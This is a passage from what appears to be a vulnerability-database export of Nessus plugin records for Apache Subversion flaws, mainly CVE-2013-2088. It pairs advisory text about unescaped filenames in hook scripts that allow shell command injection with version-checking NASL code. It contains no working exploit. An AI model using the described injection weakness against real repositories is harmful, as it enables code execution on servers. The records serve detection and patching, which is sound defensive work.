This could be used to run arbitrary\nshell commands in the context of the user whom the pre-commit script\nruns as (the user who owns the repository).", "edition": 22, "published": "2013-06-02T00:00:00", "title": "FreeBSD : devel/subversion -- contrib hook-scripts can allow arbitrary code execution (6d0bf320-ca39-11e2-9673-001e8c75030d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088"], "modified": "2013-06-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:subversion"], "id": "FREEBSD_PKG_6D0BF320CA3911E29673001E8C75030D.NASL", "href": "https://www.tenable.com/plugins/nessus/66736", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66736);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2088\");\n\n script_name(english:\"FreeBSD : devel/subversion -- contrib hook-scripts can allow arbitrary code execution (6d0bf320-ca39-11e2-9673-001e8c75030d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Subversion team reports :\n\nThe script contrib/hook-scripts/check-mime-type.pl does not escape\nargv arguments to 'svnlook' that start with a hyphen. This could be\nused to cause 'svnlook', and hence check-mime-type.pl, to error out.\n\nThe script contrib/hook-scripts/svn-keyword-check.pl parses filenames\nfrom the output of 'svnlook changed' and passes them to a further\nshell command (equivalent to the 'system()' call of the C standard\nlibrary) without escaping them. 
This could be used to run arbitrary\nshell commands in the context of the user whom the pre-commit script\nruns as (the user who owns the repository).\"\n );\n # https://vuxml.freebsd.org/freebsd/6d0bf320-ca39-11e2-9673-001e8c75030d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e41ba3e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"subversion>=1.7.0<1.7.10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"subversion>=1.2.0<1.6.23\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T06:24:51", "description": "The installed version of Subversion Server is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists in two files in the\n 'contrib/' directory that could allow arbitrary code\n execution. Note that this issue does not affect version\n 1.8.0. (CVE-2013-2088)\n\n - An error exists related to the 'mod_dav_svn' Apache\n module that could allow denial of service attacks. 
Note\n that this issue does not affect the 1.6.x branch.\n (CVE-2013-4131)", "edition": 27, "published": "2013-12-20T00:00:00", "title": "Apache Subversion 1.6.x / 1.7.x / 1.8.x < 1.6.23 / 1.7.11 / 1.8.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:apache:subversion"], "id": "SUBVERSION_1_8_1.NASL", "href": "https://www.tenable.com/plugins/nessus/71566", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71566);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/30 15:31:32\");\n\n script_cve_id(\"CVE-2013-2088\", \"CVE-2013-4131\");\n script_bugtraq_id(60265, 61454);\n\n script_name(english:\"Apache Subversion 1.6.x / 1.7.x / 1.8.x < 1.6.23 / 1.7.11 / 1.8.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Subversion Server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Subversion Server is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists in two files in the\n 'contrib/' directory that could allow arbitrary code\n execution. Note that this issue does not affect version\n 1.8.0. (CVE-2013-2088)\n\n - An error exists related to the 'mod_dav_svn' Apache\n module that could allow denial of service attacks. 
Note\n that this issue does not affect the 1.6.x branch.\n (CVE-2013-4131)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://subversion.apache.org/security/CVE-2013-2088-advisory.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://subversion.apache.org/security/CVE-2013-4131-advisory.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Subversion Server 1.6.23 / 1.7.11 / 1.8.1 or later, or\napply the vendor patches or workarounds.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:subversion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"subversion_installed.nasl\");\n script_require_keys(\"installed_sw/Subversion Server\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = 'Subversion Server';\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\npath = install['path'];\nversion = install['version'];\nprovider = install['Packaged with'];\n\nif (report_paranoia < 2) 
audit(AUDIT_PARANOID);\n\n# Affected :\n# 1.6.x < 1.6.23\n# 1.7.x < 1.7.11\n# 1.8.x < 1.8.1\nif (\n (ver_compare(ver:version, fix:'1.6.0', strict:FALSE) >= 0 && ver_compare(ver:version, fix:'1.6.23', strict:FALSE) == -1) ||\n (ver_compare(ver:version, fix:'1.7.0', strict:FALSE) >= 0 && ver_compare(ver:version, fix:'1.7.11', strict:FALSE) == -1) ||\n (ver_compare(ver:version, fix:'1.8.0', strict:FALSE) >= 0 && ver_compare(ver:version, fix:'1.8.1', strict:FALSE) == -1)\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report = '\\n Path : ' + path +\n '\\n Packaged with : ' + provider +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.6.23 / 1.7.11 / 1.8.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, provider + ' ' + appname, version, path);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:26:40", "description": "This update of subversion includes several bug and security fixes.\n\n - update to 1.7.10 [bnc#821505] CVE-2013-1968\n CVE-2013-2088 CVE-2013-2112\n\n - Client-side bugfixes :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values aren't\n UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\n - Server-side bugfixes :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is aborted\n\n - fix svnserve memory use after 
clear\n\n - fix repository corruption on power/disk failure on\n Windows\n\n - Developer visible changes :\n\n - make get-deps.sh compatible with Solaris /bin/sh\n\n - fix infinite recursion bug in get-deps.sh\n\n - fix uninitialised output parameter of\n svn_fs_commit_txn()\n\n - Bindings :\n\n - fix JavaHL thread-safety bug", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : subversion (openSUSE-SU-2013:1006-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-1968", "CVE-2013-2112"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:subversion-python", "p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:subversion-tools-debuginfo", "p-cpe:/a:novell:opensuse:subversion-debugsource", "p-cpe:/a:novell:opensuse:subversion-tools", "p-cpe:/a:novell:opensuse:subversion", "p-cpe:/a:novell:opensuse:subversion-bash-completion", "p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0", "p-cpe:/a:novell:opensuse:subversion-devel", "p-cpe:/a:novell:opensuse:subversion-server-debuginfo", "p-cpe:/a:novell:opensuse:subversion-perl", "p-cpe:/a:novell:opensuse:subversion-server", "p-cpe:/a:novell:opensuse:subversion-python-debuginfo", "p-cpe:/a:novell:opensuse:subversion-perl-debuginfo", "p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0-debuginfo", "p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0-debuginfo", "cpe:/o:novell:opensuse:12.2", "p-cpe:/a:novell:opensuse:subversion-debuginfo"], "id": "OPENSUSE-2013-494.NASL", "href": "https://www.tenable.com/plugins/nessus/75035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-494.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(75035);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\");\n script_bugtraq_id(60264, 60265, 60267);\n\n script_name(english:\"openSUSE Security Update : subversion (openSUSE-SU-2013:1006-1)\");\n script_summary(english:\"Check for the openSUSE-2013-494 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of subversion includes several bug and security fixes.\n\n - update to 1.7.10 [bnc#821505] CVE-2013-1968\n CVE-2013-2088 CVE-2013-2112\n\n - Client-side bugfixes :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values aren't\n UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\n - Server-side bugfixes :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is aborted\n\n - fix svnserve memory use after clear\n\n - fix repository corruption on power/disk failure on\n Windows\n\n - Developer visible changes :\n\n - make get-deps.sh compatible with Solaris /bin/sh\n\n - fix infinite recursion bug in get-deps.sh\n\n - fix uninitialised output parameter of\n svn_fs_commit_txn()\n\n - Bindings :\n\n - fix JavaHL thread-safety bug\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.novell.com/show_bug.cgi?id=821505\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-06/msg00136.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected subversion packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-perl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-python\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:subversion-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2|SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2 / 12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", 
reference:\"libsvn_auth_gnome_keyring-1-0-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libsvn_auth_gnome_keyring-1-0-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libsvn_auth_kwallet-1-0-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libsvn_auth_kwallet-1-0-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-bash-completion-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-debugsource-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-devel-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-perl-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-perl-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-python-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-python-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-server-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-server-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-tools-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-tools-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_gnome_keyring-1-0-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_gnome_keyring-1-0-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_kwallet-1-0-1.7.10-2.8.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_kwallet-1-0-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-bash-completion-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-debugsource-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-devel-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-perl-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-perl-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-python-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-python-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-server-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-server-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-tools-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-tools-debuginfo-1.7.10-2.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsvn_auth_gnome_keyring-1-0 / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:10:57", "description": "This update includes the latest release of Apache Subversion 1.7,\nversion 1.7.11. 
Several security vulnerabilities are fixed in this\nupdate :\n\nSubversion's mod_dav_svn Apache HTTPD server module will trigger an\nassertion on some requests made against a revision root. This can lead\nto a DoS. If assertions are disabled it will trigger a read overflow\nwhich may cause a segmentation fault or undefined behavior. Commit\naccess is required to exploit this. (CVE-2013-4131)\n\nIf a filename which contains a newline character (ASCII 0x0a) is\ncommitted to a repository using the FSFS format, the resulting\nrevision is corrupt. This can lead to disruption for users of the\nrepository. (CVE-2013-1968)\n\nSubversion's contrib/ directory contains two example hook scripts,\nwhich use 'svnlook changed' to examine a revision or transaction and\nthen pass those paths as arguments to further 'svnlook' commands,\nwithout properly escaping the command-line. (CVE-2013-2088)\n\nSubversion's svnserve server process may exit when an incoming TCP\nconnection is closed early in the connection process. This can lead to\ndisruption for users of the server. 
(CVE-2013-2112)\n\nThe following client-side bugs were fixed in the 1.7.10 release :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values\n aren't UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\nThe following server-side bugs are fixed :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is\n aborted\n\n - fix svnserve memory use after clear\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-08-15T00:00:00", "title": "Fedora 18 : subversion-1.7.11-1.fc18.1 (2013-13672)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "modified": "2013-08-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:subversion"], "id": "FEDORA_2013-13672.NASL", "href": "https://www.tenable.com/plugins/nessus/69355", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-13672.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69355);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\", \"CVE-2013-4131\");\n script_xref(name:\"FEDORA\", value:\"2013-13672\");\n\n script_name(english:\"Fedora 18 : subversion-1.7.11-1.fc18.1 (2013-13672)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest release of Apache Subversion 1.7,\nversion 1.7.11. Several security vulnerabilities are fixed in this\nupdate :\n\nSubversion's mod_dav_svn Apache HTTPD server module will trigger an\nassertion on some requests made against a revision root. This can lead\nto a DoS. If assertions are disabled it will trigger a read overflow\nwhich may cause a segmentation fault or undefined behavior. Commit\naccess is required to exploit this. 
(CVE-2013-4131)\n\nIf a filename which contains a newline character (ASCII 0x0a) is\ncommitted to a repository using the FSFS format, the resulting\nrevision is corrupt. This can lead to disruption for users of the\nrepository. (CVE-2013-1968)\n\nSubversion's contrib/ directory contains two example hook scripts,\nwhich use 'svnlook changed' to examine a revision or transaction and\nthen pass those paths as arguments to further 'svnlook' commands,\nwithout properly escaping the command-line. (CVE-2013-2088)\n\nSubversion's svnserve server process may exit when an incoming TCP\nconnection is closed early in the connection process. This can lead to\ndisruption for users of the server. (CVE-2013-2112)\n\nThe following client-side bugs were fixed in the 1.7.10 release :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values\n aren't UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\nThe following server-side bugs are fixed :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is\n aborted\n\n - fix svnserve memory use after clear\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
